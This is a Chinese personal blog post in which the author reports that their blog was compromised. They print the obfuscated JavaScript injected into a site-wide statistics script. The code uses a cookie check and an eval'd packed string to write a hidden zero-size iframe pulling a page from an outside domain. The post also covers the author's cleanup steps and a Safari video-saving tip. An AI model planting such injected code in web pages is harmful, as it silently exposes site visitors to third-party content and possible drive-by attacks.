被挂马了

我招谁惹谁了？

我的blog里每个页面都加在一个用于统计的JS文件。今天我访问自己blog时McAfee提示发现木马，我检查文件后发现上述JS里被加入了一大坨代码。据说还是用JS混淆器处理过的：

function ads(){var Then = new Date()
Then.setTime(Then.getTime() + 6*60*60*1000)
var cookieString = new String(document.cookie)
var cookieHeader = "Cookie1="
var beginPosition = cookieString.indexOf(cookieHeader)
if (beginPosition != -1){} else {document.cookie = "Cookie1=Filter;expires="+ Then.toGMTString()
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('5.6(\'<1 4=0 3=0 2="7://8.d/c/b.9?a">\');',14,14,'|iframe|src|width|height|document|writeln|http|mydeller|htm|feng|add_651435|page|cn'.split('|'),0,{}))
window.status=" ";}}ads();

我把JS保存到本地，用safari打开，用safari的web检查器检查，发现貌似只是一个刷流量的东西，调用了51.la的统计代码还有别的乱七八糟。。。

我也不知道怎么就被挂马了，是服务器被黑了呢还是我自己的原因？总之我已经修改了空间里几乎所有程序的密码，顺便把一些来路不正的源码删掉了。希望可以安全。

顺便。。。safari是个好东西，有了它就不要到处找什么FLV下载器了，在播放在线视频的时候按ctrl+alt+A（或者在菜单里选择窗口-活动）你会发现一个正在不断下载中的文件，双击之就能保存到本地了哦耶。

fin.